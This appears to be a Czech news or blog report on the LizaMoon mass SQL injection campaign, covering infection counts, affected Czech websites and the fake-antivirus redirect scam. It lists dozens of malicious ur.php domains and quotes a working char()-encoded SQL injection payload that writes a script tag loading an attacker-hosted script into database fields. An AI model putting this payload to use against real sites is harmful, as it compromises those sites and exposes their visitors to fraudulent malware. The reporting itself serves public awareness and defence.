LizaMoon SQL injection útok stále pokračuje, až 1.5 milionu nakažených stránek

SQL Injection útok pojmenovaný LizaMoon v Google indexu ukazuje už na 559 tisíc nalezených výsledků a TrendLabs upozorňuje na další rozšíření používaných domén.

LizaMoon, Etc. SQL Injection Attack Still Ongoing upozorňuje, že LizaMoon útočníci rozšířili počet domén, které používají pro spouštění útočného kódu. Útoky zatím stále pokračuje a pokud se podíváte na čísla v Google, tak od prvního dubna došlo k zdvojnásobení počtu zjištění nakažených adres. Podle GCN je nakaženo až 1.5 milionu webových stránek.

V ČR jsou viditelné tři nakažené weby – stavebnistandardy.cz, forum.mzh.cz a filatelie-stosek.cz, tady jeden nový od prvního dubna. Napadení počítačů návštěvníků těchto webů podle Trend Micro probíhá pomocí TROJ_FAKEAV.BBK a TROJ_WORID.A. Návštěvník napadené stránky je přesměrován na nabídku falešného antiviru (Windows Stability Center), který se klasickým podvodem snaží uživatele přesvědčit, že jeho počítač je zavirovaný a měl by si pořídit (falešný) antivir. Pokud uživatel nabízený falešný antivir nainstaluje, je ztracen.

Zdroj: Update on LizaMoon mass-injection and Q&A

Počet používaných domén pro útočný skript už jde do desítek

lizamoon.com/ur.php
tadygus.com/ur.php
alexblane.com/ur.php
alisa-carter.com/ur.php
online-stats201.info/ur.php
stats-master111.info/ur.php
agasi-story.info/ur.php
general-st.info/ur.php
extra-service.info/ur.php
t6ryt56.info/ur.php
sol-stats.info/ur.php
google-stats49.info/ur.php
google-stats45.info/ur.php
google-stats50.info/ur.php
stats-master88.info/ur.php
eva-marine.info/ur.php
stats-master99.info/ur.php
worid-of-books.com/ur.php
google-server43.info/ur.php
tzv-stats.info/ur.php
milapop.com/ur.php
pop-stats.info/ur.php
star-stats.info/ur.php
multi-stats.info/ur.php
google-stats44.info/ur.php
books-loader.info/ur.php
google-stats73.info/ur.php
google-stats47.info/ur.php
google-stats50.info/ur.php

WebSense (odkud je také předchozí seznam používaných domén) nabízí i pohled na kód používaný pro SQL Injection, další detaily nabízí Attack on ASP site that uses a SQL server database na StackOverflow.com

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)

+as+varchar(8)))–

Prozatím není jasné jak je SQL Injection využíváno – známé je, že se týká pouze webů používajících Microsoft SQL Server. A také, že nejde o chybu v MSSQL – je využívána chyba v nějakém jiném software, které tyto weby používají.

SQL Injection útok uspěl až na stovkách tisíc adres

Stovky tisíc kompromitovaných webových adres v masivním útoku využívajícím SQL Injection, vsunutí SQL kódu do neošetřeného vstupu webové aplikace. Vsouván je odkaz s útočným skriptem kdy je uživatel přesměrován na podvodné „antivirové“ software.

Chyba při zpracování vstupních parametrů umožňuje útočníkům využít tzv. SQL Injection – vsunutí SQL kódu. Ten se potom spustí ve webové aplikaci a umožní vložit data do SQL serveru. Používá se jako tradiční prostředek pro hacking, ale své využití má už řadu let ve vkládání spamu – zejména odkazů na útočný kód.

K tématu :

Čerstvá vlna útoku vkládá odkaz na JavaScript z domén lizamoon.com a  alisa-carter.com (v obou případech odkaz vede na ur.php a obě domény jsou aktuálně odstavené a nefunkční). Než se útoku podařilo zamezit odstavením používaných domén, odkaz návštěvníka napadeného webu zavedl na nabídku podvodného „antivirového“ software.

Útočný kód se dostal i na tak prominentní místa jako je Apple iTunes – najdete ho na stránkách některých produktů. Nedostal se tam napadením iTunes, ale zvenčí, přes data získávána přes RSS a importovaná do produktových stránek. Útočný kód na iTunes je nefunkční – Apple příchozí RSS zpracovává způsobem, který zamezuje vykonání.

Aktuální vlna útoků je dokumentována websense v LizaMoon mass injection hits over 226,000 URLs (was 28,000) a pohledem do Google můžete snadno zjistit, kolik URL je již v indexu Google  -(aktuálně 292 tisíc pro lizamoon.com variantu a 98 tisíc pro alisa-carter.com variantu). Problém se nevyhnul ani České republice – v indexu Google najdete napadený web StavebniStandardy.cz a filatelie-stoesk.cz.

Velmi pravděpodobně ale existují ještě další varianty umístění útočného skriptu – hledání na ur.php v Google nabízí 291 tisíc výsledku a další rozdílné domény – google-stats50.info, multi-stats.info, google-stat48,info, alexblane.com a řadu dalších.